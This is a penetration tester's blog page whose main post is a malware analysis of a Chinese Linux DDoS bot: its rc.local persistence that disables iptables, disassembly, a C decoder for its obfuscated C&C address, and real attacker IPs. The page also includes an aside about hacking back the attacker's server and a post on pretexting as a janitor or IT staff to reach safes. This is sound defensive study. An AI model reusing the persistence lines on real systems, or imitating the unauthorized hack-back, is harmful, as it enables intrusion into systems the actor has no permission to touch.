What I do

I am an Information Risk Consultant and Penetration Tester. I specialize mostly in penetrating secure networks/computer systems, where I simulate an organized professional attack against your organization, after which a detailed report with the weaknesses and exploited vectors is summarized. This will help you gain control over your infrastructure's security and maximize your protection.

Sunday, October 26, 2014

CHINA ELFs

It's been a while since I posted; I've been crazy busy, but this coming month I will set aside some time just for blogging.

A few months ago, we were testing a KE Govt office that was complaining of high attacks which they didn't understand and couldn't find, since it was Linux based. And as you know, GOK has less capacity as far as Cyber Crime and Cyber Warfare are concerned. So during our tests, we landed on Linux.DDoS.22.

During penetration tests we get to find a lot, and I can assure you it is not only cyberwarfare in E. Africa; there are a lot of cyber espionage attacks and cyber terror happening right now.

Linux.DDoS.22 is a Chinese ELF that is used for DDoS attacks on unaware infrastructures around the world. The attackers install the ELF as pktmake, which you will find in /bin on your Linux servers, and it modifies your /etc/rc.local for automatic restarts, like below:

cat /etc/rc.local
#!/bin/sh -e
/root/task1 reboot
/root/server reboot
/root/guchun26 reboot


It will even stop iptables, as follows, in rc.local:

cd  /root/
./10&
/etc/init.d/iptables stop
cd  /root/
./10&
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./10
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./10
/etc/init.d/iptables stop
cd  /root/
./ma&
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
[the three-line "./ma" block above is repeated a further 45 times, omitted here]
cd  /root/
./guchun
/etc/init.d/iptables stop
[the three-line "./guchun" block above is repeated a further 16 times, omitted here]
/bin/cmds start

During our reverse engineering and forensics we realized the ELF was collecting information about the infected box (hardware, processor information, amount of memory), which is sent to some Chinese crooks via encrypted communication to a C&C.

The C&C is usually hard-coded in the source code, but the Chinese use mathematical formulas to hide the information, and it's up to the forensics engineers to find that information via reverse engineering, counter cyber intelligence and covert data acquisition.

One of the IPs can be found with common checks using lsof, as below:

pktmake    1355    root    3u  IPv4   9964      0t0  TCP REDACTED.xx.ke:36811->23.234.50.32:37368 (ESTABLISHED)

With reverse engineering we were able to find other IPs from China that were used to upload logs and update the box, but the above machine, if hacked, could give more intel about the main C&C, and that's what we were after.

An nmap scan on the box showed us this:

Nmap scan report for 23.234.50.32
Host is up (0.32s latency).
Not shown: 65305 closed ports, 44 filtered ports
PORT      STATE SERVICE       VERSION
80/tcp    open  http-proxy    Squid http proxy 2.7.STABLE4
89/tcp    open  http          Microsoft IIS httpd
1025/tcp  open  msrpc         Microsoft Windows RPC
3306/tcp  open  mysql         MySQL (unauthorized)
5918/tcp  open  ms-wbt-server Microsoft Terminal Service
37368/tcp open  unknown


So, I am not going to go deep into how this Chinese box was exploited, but after some reverse engineering of the ELFs:

/bin/pktmake: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped

We found other ELFs that had strong associations with the main ELF.

file /bin/cmds
/bin/cmds: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.18, not stripped

file /root/guchun26
/root/guchun26: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped

And these were the source files it was compiled from:

crtstuff.c
main.cpp
DNS.cpp
AttackLogic.cpp
Iattack.cpp
info.cpp
Lock.cpp
SYN.cpp
TaskManager.cpp
TCP.cpp
TcpClient.cpp
Thread.cpp
UDP.cpp
utils.cpp
CC.cpp
rc4.c

The first part was to find the pieces of code showing how the ELF connects to the C&C, and from there how we would find all the other boxes they were using for the initial attacks.

_v2072 = ">>>>>>>>>>> in net wrok thread";
     *__esp = 135652608;
    _t31 = __ebx->basic_ostream& , 5, char * )(__edi, __esi);
    _v2072 = 134746416;
     *__esp = _t31;
    L0807EF10();
    L080DEAD0(__ebx, __edi, __esi,  &_v2052, 0, 2048);
    while(( *(_a4 + 100) & 255 ^ 1) != 0) {
        _t39 = _a4 + 560->c_str(void )();
        _v2068 = 37368;
        _v2072 = _t39;
         *__esp = _a4 + 60;
        if((_t39->Connect(char * , unsigned int )() ^ 1) == 0) {
            if((L08049C60(_a4, _a4) ^ 1) == 0) {
                while(( *(_a4 + 100) & 255 ^ 1) != 0) {
                    L080DEAD0(__ebx, __edi, __esi,  &_v2052, 0, 2048);
                    if((L0805223E( ?_? ( &_v2052), _a4 + 60,  &_v2052) ^ 1) != 0) {


That's when we started to understand the mathematical formula used by the intruder.
Alright, some segment mapping:

  Segment Sections...
   00     .note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
   01     .tdata .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
   02     .note.ABI-tag
   03     .tdata .tbss

There was a lot of Chinese language in the source code:

.rodata:081301A0 aINZD  db 'エエスィヤュハシフラスモラヨハァーワ(%d)',0Dh,0Ah,0
0x00747E0  CUNG5
0x007518F  CUNG
0x0075693  B4CUNG
0x0102520  i18n:1999
 
A file called fake.cfg had some juicy information:


0
YOUR-IP-HERE:AND-HERE
10000:60000
 
getsockname(3, {sa_family=AF_INET, sin_port=htons(48417), sin_addr=inet_addr("mmd.mmd.mmd.mmd")}, [16]) = 0

Also, they were doing test connections using www.baidu.com, to see if it's reachable once the ELF is installed.

0x00E50FD  www.baidu.com
// PoC:
sendto(3, "\231\v\1\0\0\1\0\0\0\0\0\0\3www\5baidu\3com\0\0\1\0\1", 31, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 31
recvfrom(3, "\231\v\201\200\0\1\0\2\0\0\0\0\3www\5baidu\3com\0\0\1\0\1\300"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, [16]) = 74


The DDoS functionality was actually in a file called ThreadAttack.cpp. This was interesting, because this is where we realized we might catch the main Chinese C&C server.
0x805478A ; CThreadAttack::EmptyConnectionAtk(CSubTask &)
  0x805478A public _ZN13CThreadAttack18EmptyConnectionAtkER8CSubTask
  0x805478A _ZN13CThreadAttack18EmptyConnectionAtkER8CSubTask proc near
  0x805478A push ebp
  0x805478B mov  ebp, esp
  0x805478D leave
  0x805478E retn
  0x805478E
  0x805478E _ZN13CThreadAttack18EmptyConnectionAtkER8CSubTask endp
 
  0x8054790 ; CThreadAttack::HttpAtk(CSubTask &)
  0x8054790 public _ZN13CThreadAttack7HttpAtkER8CSubTask
  0x8054790 _ZN13CThreadAttack7HttpAtkER8CSubTask proc near
  0x8054790 push ebp
  0x8054791 mov  ebp, esp
  0x8054793 leave
  0x8054794 retn
  0x8054794
  0x8054794 _ZN13CThreadAttack7HttpAtkER8CSubTask endp
 
  0x8054796 ; CThreadAttack::FakeUserAtk(CSubTask &)
  0x8054796 public _ZN13CThreadAttack11FakeUserAtkER8CSubTask
  0x8054796 _ZN13CThreadAttack11FakeUserAtkER8CSubTask proc near
  0x8054796 push ebp
  0x8054797 mov  ebp, esp
  0x8054799 leave
  0x805479A retn
  0x805479A
  0x805479A _ZN13CThreadAttack11FakeUserAtkER8CSubTask endp
  0x80532D2 sub  esp, 214h ; Integer Subtraction
  0x80532D8 lea  ecx, [ebp+var_10C] ; Load Effective Address
  0x80532DE mov  edx, offset _ZZN9CServerIP10InitializeEvE4C_48 ; CServerIP::Initialize(void)::C.48 <======
  0x80532E3 mov  eax, 100h
  0x80532E8 sub  esp, 4  ; Integer Subtraction
  0x80532EB push eax
  0x80532EC push edx
  0x80532ED push ecx
  0x80532EE call memcpy  ; Call Procedure
  0x80532F3 add  esp, 10h; Add
  0x80532F6 lea  ecx, [ebp+var_20C] ; Load Effective Address
  0x80532FC mov  edx, offset _ZZN9CServerIP10InitializeEvE4C_49 ; CServerIP::Initialize(void)::C.49 <======
  0x8053301 mov  eax, 100h
  0x8053306 sub  esp, 4  ; Integer Subtraction
  0x8053309 push eax
  0x805330A push edx
  0x805330B push ecx
  0x805330C call memcpy  ; Call Procedure
  0x8053311 add  esp, 10h; Add
  0x8053314 push 27h
  0x8053316 push offset a7005601212 ; "70/056/012/12"  ; <============================
  0x805331B push 0FFh
  0x8053320 lea  eax, [ebp+var_10C] ; Load Effective Address
  0x8053326 push eax
  0x8053327 call _ZN8CUtility7DeCryptEPciPKci ; CUtility::DeCrypt(char *,int,char  const*,int)
  0x805332C add  esp, 10h; Add
  0x805332F push 0Ah
  0x8053331 push offset a63551; "63551" ; <============================
  0x8053336 push 0FFh
  0x805333B lea  eax, [ebp+var_20C] ; Load Effective Address
  0x8053341 push eax
  0x8053342 call _ZN8CUtility7DeCryptEPciPKci ; CUtility::DeCrypt(char *,int,char  const

So far we had the formula; now it was all about getting down to cracking the code on the C&C information.
0x8062EF0
  0x8062EF0 ; CUtility::DeCrypt(char *, int, char  const*, int)
  0x8062EF0 public _ZN8CUtility7DeCryptEPciPKci
  0x8062EF0 _ZN8CUtility7DeCryptEPciPKci proc near  ; CODE XREF: CServerIP::Initialize(void)
  0x8062EF0 ; CServerIP::Initialize(void)
  0x8062EF0
  0x8062EF0 var_4= dword ptr -4
  0x8062EF0 arg_0= dword ptr  8
  0x8062EF0 arg_4= dword ptr  0Ch
  0x8062EF0 arg_8= dword ptr  10h
  0x8062EF0 arg_C= dword ptr  14h
  0x8062EF0
  0x8062EF0 push ebp
  0x8062EF1 mov  ebp, esp
  0x8062EF3 sub  esp, 10h; Integer Subtraction
  0x8062EF6 mov  [ebp+var_4], 0
  0x8062EFD jmp  short loc_8062F36 ; Jump
  0x8062EFD
  0x8062EFF
  0x8062EFF loc_8062EFF: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062EFF mov  eax, [ebp+var_4]
  0x8062F02 and  eax, 1  ; Logical AND
  0x8062F05 test al, al  ; Logical Compare
  0x8062F07 jzshort loc_8062F1E ; Jump if Zero (ZF=1)
  0x8062F07
  0x8062F09 mov  eax, [ebp+var_4]
  0x8062F0C mov  edx, eax
  0x8062F0E add  edx, [ebp+arg_0] ; Add
  0x8062F11 mov  eax, [ebp+var_4]
  0x8062F14 add  eax, [ebp+arg_8] ; Add
  0x8062F17 mov  al, [eax]
  0x8062F19 inc  eax  ; Increment by 1
  0x8062F1A mov  [edx], al
  0x8062F1C jmp  short loc_8062F31 ; Jump
  0x8062F1C
  0x8062F1E
  0x8062F1E loc_8062F1E: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062F1E mov  eax, [ebp+var_4]
  0x8062F21 mov  edx, eax
  0x8062F23 add  edx, [ebp+arg_0] ; Add
  0x8062F26 mov  eax, [ebp+var_4]
  0x8062F29 add  eax, [ebp+arg_8] ; Add
  0x8062F2C mov  al, [eax]
  0x8062F2E dec  eax  ; Decrement by 1
  0x8062F2F mov  [edx], al
  0x8062F2F
  0x8062F31
  0x8062F31 loc_8062F31: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062F31 lea  eax, [ebp+var_4] ; Load Effective Address
  0x8062F34 inc  dword ptr [eax] ; Increment by 1
  0x8062F34
  0x8062F36
  0x8062F36 loc_8062F36: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062F36 mov  eax, [ebp+var_4]
  0x8062F39 cmp  eax, [ebp+arg_C] ; Compare Two Operands
  0x8062F3C jge  short locret_8062F52 ; Jump if Greater or Equal (SF=OF)
  0x8062F3C
  0x8062F3E mov  eax, [ebp+var_4]
  0x8062F41 cmp  eax, [ebp+arg_4] ; Compare Two Operands
  0x8062F44 jge  short locret_8062F52 ; Jump if Greater or Equal (SF=OF)
  0x8062F44
  0x8062F46 mov  eax, [ebp+var_4]
  0x8062F49 add  eax, [ebp+arg_8] ; Add
  0x8062F4C mov  al, [eax]
  0x8062F4E test al, al  ; Logical Compare
  0x8062F50 jnz  short loc_8062EFF ; Jump if Not Zero (ZF=0)
  0x8062F50
  0x8062F52
  0x8062F52 locret_8062F52: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062F52 ; CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062F52 leave; High Level Procedure Exit
  0x8062F53 retn ; Return Near from Procedure
  0x8062F53
  0x8062F53 _ZN8CUtility7DeCryptEPciPKci endp
  0x8062F53

And this decoded the main C&C as 61.147.103.21:54460.
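As an added example (not the author's or the malware's code), here is the CUtility::DeCrypt routine reimplemented in C from the disassembly above and applied to the two literals pushed in CServerIP::Initialize; the function names and the decode_config_string helper are mine.

```c
#include <stdio.h>
#include <string.h>

/* Reimplementation (not the malware's own code) of
 * CUtility::DeCrypt(char *dst, int dst_size, const char *src, int n)
 * as read from the disassembly: walk src while i < n, i < dst_size and
 * src[i] != 0; bytes at odd offsets get +1, bytes at even offsets get -1.
 * Only the low byte (al) is stored, so the arithmetic wraps modulo 256. */
void decrypt(char *dst, int dst_size, const char *src, int n)
{
    for (int i = 0; i < n && i < dst_size && src[i] != '\0'; i++) {
        unsigned char c = (unsigned char)src[i];
        dst[i] = (char)((i & 1) ? c + 1 : c - 1);
    }
}

/* Helper (mine): mirrors the caller, which memcpy()s a 0x100-byte constant
 * into the output buffer before calling DeCrypt with dst_size = 0xFF and a
 * per-string length bound n. Zeroing the buffer first is what provides the
 * NUL terminator, since DeCrypt never writes one itself. Returns buf. */
const char *decode_config_string(char buf[256], const char *src, int n)
{
    memset(buf, 0, 256);
    decrypt(buf, 0xFF, src, n);
    return buf;
}

int main(void)
{
    char ip[256], port[256];
    /* The obfuscated literals and length bounds (27h, 0Ah) pushed in
     * CServerIP::Initialize, taken from the disassembly on this page. */
    printf("C&C: %s:%s\n",
           decode_config_string(ip, "70/056/012/12", 0x27),
           decode_config_string(port, "63551", 0x0A));
    return 0;
}
```

The same routine can be run over any other string literal passed to DeCrypt in a sample of this family to recover its configuration without executing the binary.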

This C&C server also hosted, on an HFS app, the binaries used to update the small operational botnets.

One of the machines we caught, which was used to manipulate the L.A. Chinese bot server, was 220.191.230.250.
Now do some research on that, and tell me if you know who those are.


Wednesday, July 02, 2014

MYTHS ON BIOMETRICS

Myth: Iris recognition devices use lasers to scan your eyes.

Reality: Iris recognition cameras take a black and white picture and use non-invasive near-infrared illumination that is barely visible and very safe.

Myth: "Stolen" body parts can be used to fool the system.

Reality: Quality biometric recording and detection systems can determine "liveness" in order to prevent this type of fraud.

Myth: Identical twins can fool the system.

Reality: If the system is poorly configured, then this is possible, though it can be eradicated during White Box Penetration Testing. Good systems will highlight a false match, which will require human intervention to complete the identification process.

Myth: Biometrics will get rid of the evil in our world.

Reality: Identity Management systems cannot perform miracles.


Continue doing real Penetration Testing, and let's secure facilities for real.

Wednesday, June 25, 2014

WHY DO PEOPLE STILL CODE IN BIRTHDAYS

Safes are hard to break, they say, but as long as the safe is used by a human being and built by one, it's not 100% a safe anymore.

Sometimes during pentests we get to go face to face with these machines, and with enough intel we know that what is behind that door is vital to what we are after. A lot of testers don't think this way, but as experience grows in this field, you get to learn that this is a necessary strategy in real-life types of pentest like Blackbox. Now getting to where the safe is, is always a problem; it may require you to go through a lot of hoops, e.g. as a janitor. Well, during this operation, I acted as Network Support.

IT people have broad access to executive offices. Have you ever seen how happy an office boss gets when you fix an MS Windows problem that had bothered them for a while?
"Now I can watch new movies?"
"Yes ma'am."
"Even the new ones that I couldn't before?"
"Yes, I can copy more for you if you want."
"Go ahead, go ahead Chuck."

So one thing I have come to find is the use of digits as key codes, and personnel love using numbers they can remember; even I have that vulnerability on such authentication, e.g. SIM PIN numbers, M-Banking etc. The easiest digits people remember all their life, even when suffering from Old Timers, are birthdays. And a lot of users will simply use these on a safe. Now the problem for us as pentesters is not being in a position to do enough research on target employees online, e.g. social media and online security assessment.

Surveillance and Recovery Assessment is essential for such intrusions in a big way, and this is done in teams. You might find that you get a lot of access to a facility just through this kind of assessment. I am currently doing a pentest which is similar to this, and I started as a janitor; it's amazing that the employees won't ask who you are as long as you are serving them or cleaning their desks.

Employees and senior management need to understand that security starts with everyone, not just the ICT department thrown in a corner cubicle and paid peanuts.

So most safes are used for storage of money, but others store confidential documents. The personnel dealing with these documents need to have that sense of security, especially about their surroundings and who has access to their office. Sometimes these safes might hold information about the whole infrastructure and other company secrets that can seriously damage the organization.

When buying a safe, it's important to understand which ones are the tough ones, and the value it will add to the company as far as security is concerned.

So whenever you hire a security firm for a Blackbox penetration test and they are just doing perimeter scans, just know these are the consultants we call Script Kiddies, and they are not in any way helping you to secure your infrastructure.